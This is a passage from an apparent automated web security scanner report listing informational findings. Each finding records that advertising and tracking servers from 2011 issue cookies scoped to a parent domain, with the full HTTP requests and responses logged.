Set-Cookie: rdk2=0; expires=Sun, 30-Jan-2011 02:29:43 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=7531^1&13236^1; expires=Mon, 31-Jan-2011 05:59:59 GMT; max-age=109816; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3186999.js^1^1296350983^1296350983&328960.js^1^1296308415^1296308415; expires=Sun, 06-Feb-2011 01:29:43 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3186999"
...[SNIP]...

16.167. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /A06546/b3/0/3/1003161/543149170.js HTTP/1.1
Host: pix04.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: udm_0=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; rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=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; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d69b449&0&&4d43b3c1&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 02:17:45 GMT; Path=/
X-Proc-ms: 11
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 733
Date: Sun, 30 Jan 2011 02:17:45 GMT
Connection: close

/* Vermont-12.4.0-1012 */
rsinetsegs=['A06546_10827','H05525_10833','A06546_50376'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[
...[SNIP]...

16.168. http://pix04.revsci.net/A06546/b3/0/3/1003161/543149170.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A06546/b3/0/3/1003161/543149170.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A06546/b3/0/3/1003161/543149170.js?D=DM_LOC%3Dhttp%253A%252F%252Fmsn.whitepages.com%252F%253F_rsiL%253D0%26DM_CAT%3DWhitepages%2520Homepage%26DM_REF%3Dhttp%253A%252F%252Fburp%252Fshow%252F15%26DM_EOM%3D1&C=A06546 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_segs_1000000=pUPFek+FKAIQ1kNbPCvXupu0dYRBBw10Qnf0xWQrS0BEV6VWEHVfSnhpJVW5Lutkv1AyDl7qxTuCJgKvTPglemXPFwXO/l9yiURcsiUamtWcEzbP2TrfBHkE6to317EuNk9+iXSG4DvY1g/WBQ7a8qgeGg5oDbhmSSc5VoUxIBgQS/K4Q3yRHjMx2E0L81Hpbsggz0uWpYjffiAisiXmERkc/1665y5ZjB1b5STeJ4Pw4InvEOIoEyC78lpwlYmIydTi5ad2s/hOwYyScvdENQ==; rtc_0=MLsvrtMvcS5nJQFEBOfISErx+c1JMM1lDAyWHQIjVfvuhWI24GqMWoF/oWJdVrkRObfmVAFC7D5kNDpA7XLOLyXT7eHooUJSyInu6zq77Ti1xy5n8Qg3XeEe+tnQc/qNK5SeIuNm9OiemNvg0uPlUbqN72Pj+9+Ar1bDVU7hjepOYqJdor+NnFmpdNvQfxTIoHitxigPuoiTVzaqoruXF69raqbuvDx9NSxO37yG1cXJQrgqNEJYL+2aRbtieJoq+tCHUpTw8bYVhr5p0THE5yB09PMYdBM/swb+JMOM7Snl6/uAVD2lwzGGjsLQzOAv+uBqR8jCXnxVhvn7VWB6iHsq1LcapkedsIN3gi/o04igBj2IKrYeTcLWm4dMlDT7lMD1xWUmpmHTEibAOge6OBtRCgwHRB4CstW16Jo3oxnT; rsi_us_1000000=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; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeU+FbxIQlVNYvPsemd1+k2RVNJ84PixU5WRr0r6Qywadg+otlqGxKr7OS2Tzwu4/In5EGUAqJWLB0DOxgg/CuOXW8YP+vFRmMjOLHe04PzvmT/vqkZ5VMxzqzXrrENqLroKKf6k341pRrKSaywJJTHEgZhWrYFVTKHcr5jXkc94hOIoKl1bm0QymdMHOj+nrIpL/JfZ7r/Uig5xRzUD4U0LWwa2N+zYoP8sqyQqHnKJCkHB+/FJZtglBhjUBpyF9uVhwdrX8M1fM90HAYCHrIlO/SjgkS/Jvwa4v7A==; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/
Set-Cookie: NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; Domain=.revsci.net; Expires=Sun, 27-Feb-2011 01:29:45 GMT; Path=/
Set-Cookie: rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:29:45 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/javascript;charset=UTF-8
Content-Length: 733
Date: Sun, 30 Jan 2011 01:29:44 GMT

/* Vermont-12.4.0-1012 */
rsinetsegs=['A06546_10827','H05525_10833','A06546_50376'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.replace(/.*(\.[
...[SNIP]...

16.169. http://pix04.revsci.net/D08734/a1/0/0/0.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; udm_0=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; rsi_us_1000000=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; rsi_segs_1000000=pUPFeU+FbxIQlVNYvPsemd1+k2RVNJ84PixU5WRr0r6Qywadg+otlqGxKr7OS2Tzwu4/In5EGUAqJWLB0DOxgg/CuOXW8YP+vFRmMjOLHe04PzvmT/vqkZ5VMxzqzXrrENqLroKKf6k341pRrKSaywJJTHEgZhWrYFVTKHcr5jXkc94hOIoKl1bm0QymdMHOj+nrIpL/JfZ7r/Uig5xRzUD4U0LWwa2N+zYoP8sqyQqHnKJCkHB+/FJZtglBhjUBpyF9uVhwdrX8M1fM90HAYCHrIlO/SjgkS/Jvwa4v7A==; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeUOFbwIUllNab/cemd1+k3oMcz9wc4mVCGdkHCrwWmaePNeODkXbq2K+tQyP8LR5ylRhRNgirDTpoIcrk+cIkXXfbtlOSmsfU1UZkujEsLbnRvi1mdYlE9GqFbJhJJ6Bxw2/6Vp1FAEA8dbQxknNO77OBB0EhWDzhf+pHpllJGeHUdUpo++k4d+c5bY1Qvx4d5W47BVKBDhTd7AdL12fLl6zFZaTu+rTxdLhlftv2v2MUDe2Y91CvpzYDUg3O3napeeKccCImESkDVzox9S9Nh2WBZtMXhJbvQq6; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Mon, 30-Jan-2012 01:30:06 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Sun, 30 Jan 2011 01:30:06 GMT

GIF89a.............!.......,...........D..;

16.170. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4d21fad0-365c5-43e3d-97d7a; d=EHAAG6ANq0itiBDbz6HJXbIAAboBAfYFgfQAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EBAAG6ANq0itiBDbz6HJXbIAAboBAfcFgZUAmtGkrxPyD5ELwXzlIG3R8gDChB0bohjR4QCJENoVz2kQ4QANEOECjRk_44OSDUKoTRMW4QsYEfopG3wRwQsRCFGx4QA9EAAiABcoSCVfgoGyODsR4Zoh; expires=Sat, 30-Apr-2011 01:29:45 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 30 Jan 2011 01:29:45 GMT
Server: QS

GIF89a.......,.................D..;

16.171. http://ptsd.eyewonder.com/ewr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ptsd.eyewonder.com
Path:   /ewr

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ewr?cid=20015042&versionid=3 HTTP/1.1
Host: ptsd.eyewonder.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ew=MDAwMTI5NjMzNTIzMjE4MTAwMDAyMDM3NzFfMTI5NjM1MDQ2MjU2MV8xMV9fXzA; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
Set-Cookie: ewroi=""; Domain=.eyewonder.com; Expires=Sun, 27-Mar-2011 01:21:02 GMT; Path=/
P3P: CP="NON DSP COR NID CURa PSAa PSDa OUR STP UNI COM NAV STA LOC OTC", policyref="http://pts.eyewonder.com/static/ew/w3c/p3p_eyewonder.xml"
gmtdiid: 8a8486852dd2373f012dd2d1a0311046
Content-Type: text/javascript;charset=US-ASCII
Content-Length: 325
Date: Sun, 30 Jan 2011 01:21:02 GMT
Connection: close

/* Created On: 1296350462561 */var ew20015042_dynamicAdModel={acid: 0,adid: 200927,eid: 20015042,tid: 0,emv: 4,uid: null,value: ''};document.writeln('<scr'+'ipt language="Javascript" id="ew20015042_wr
...[SNIP]...

16.172. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461^950192^1183^0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:28 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:28 GMT
Connection: close
Set-Cookie: C2=ckaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: F1=BwRqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: BASE=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!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:28 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,730461^950192^1183^0,1_; domain=advertising.com; path=/click

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://c">here</a>.</h2>
</body></html>

16.173. http://r1-ads.ace.advertising.com/click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/site=0000730461/mnum=0000950192/cstr=12110217=_4d44bf07,6566708061,730461_950192_1183_0,1_/xsxdata=$XSXDATA/bnum=12110217/optn=64 HTTP/1.1
Host: r1-ads.ace.advertising.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: F1=BcwvE1kAAAAAdVyCAEAAgEABAAAABAAAAUAAGAA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|an=Sun, 20 Feb 2011 18:19:40 GMT|; BASE=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!; ACID=Bc330012940999670074; GUID=MTI5NjMwODMzMjsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; A07L=3dzaKJUOYWQidaSHS5y0YmSmFaXEvvd0LZvbK5g_-GSwVryO8dt0x1w; C2=H8LRNJpwIg02FzECdbdxMhwUwXMTI8Y4FzECYTexMhQ3gZMTIQTnGzECF2pxMhAohXMTIYZ4FzECKGexMhwohXMTIca4FzECiGexMhQshXMTwOYAM/ohjI7YCwAoGs0r1RQcKaQMGK2AI9YhqN53EkL3FHzgPXw6TVcVsumB/0mRjca7HIaWGBQrMew41ZYDkq1B6bjRNq6bDwWZGs6r4jQsMaEKwaHCW8oRo0I9IsfzFnysNiQQoaMT; ROLL=v5Q2H0MbU/zqUNH1h7d3T1ystuIiEaPHy4fCVadX/ASOjE6f+wnqYseyuA0vwlvFYFjqzjc8zqkwR3t+XXAr8QlWG4SSF/7N1Eja1YV2UmztMwbFznDUKtzd8HNCCLwX3RIWa/0nS8WT042H7E5JNtYzd2SZZdA!;

Response

HTTP/1.1 302 Moved Temporarily
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Location: http://c
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 30 Jan 2011 18:08:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 125
Date: Sun, 30 Jan 2011 18:08:30 GMT
Connection: close
Set-Cookie: C2=ekaRNJpwIg02FsBCdbdBbgwUwXwGI8Y4FsBCYTeBbgQ3gZwGIQTnGsBCF2pBbgAohXwGIYZ4FsBCKGeBbgwohXwGIca4FsBCiGeBbgQshXwGwOIAM/oxxL7YCwAoGlxr1NQcKa0/GK2AI9Yx4M53EkL3FAwgPXw6TVAJsuWB/0mhxfa7GIaWG6crMaw41Z82kq1B6bjhbp6bDwWZGl3r4fQsMao9wa3BW8oh23I9HsfzFg/sNiQQoawGCKCC9mUBwB; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: F1=B4RqF1E; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: BASE=YnQIw8MmSf+Tkd8dWtaeW84rjjGaJl2JpJJ5e82KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC5uk1WFp+Zw63fzJnhGhJ9szxwHZQnZLI364iQjUbvXTIm5HoBJ/dvGZzKkH34A2YJp0mlrsdsoHFQpedEnsa1jeNn6DX4gEe8q7+PfCnaoMfuk12NE/thpzCn5VOb439eAtA8H94fPT2rXaUFI5B8ZpnMfoxItOvXLGaW4J4F0dmWeier4pMWAS2vxuWBCRUhUAUMdxmDZkV0elS56NOPbQGc4/x8C3O1qy6+lsqVS0JVS4aPSuzn3Ehr11AyP/sYZxiJMJ62cPqgtVaKoBR0tBKArR5M6ZEkksVxhNYu5MwpJ5jE+KhQNwbqIaCZcBvRiSaOOCc9v4hyiZTg86THBE/lb4ruixI+EufQQeHrI0KcamCQSOCxGBBEycusl82vNHuKFXJuLVCAU35iawlCzwpTzbs5w3W/ZCdgMBRs9GM44HthzXXU1dDY4OPC59B0jBKtwOuWupJMebppDp4Oazc+50+y94tvsDw3jRRrBy/Mm/RtrVR0xC+ByQvRH!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: ROLL=v5Q2U0M!; domain=advertising.com; expires=Tue, 29-Jan-2013 18:08:30 GMT; path=/
Set-Cookie: 12110217=_4d44bf07,6566708061,730461^950192^1183^0,0_; domain=advertising.com; path=/click
Set-Cookie: 6566708061=_4d44bf07,6566708061,,1_; domain=advertising.com; path=/click

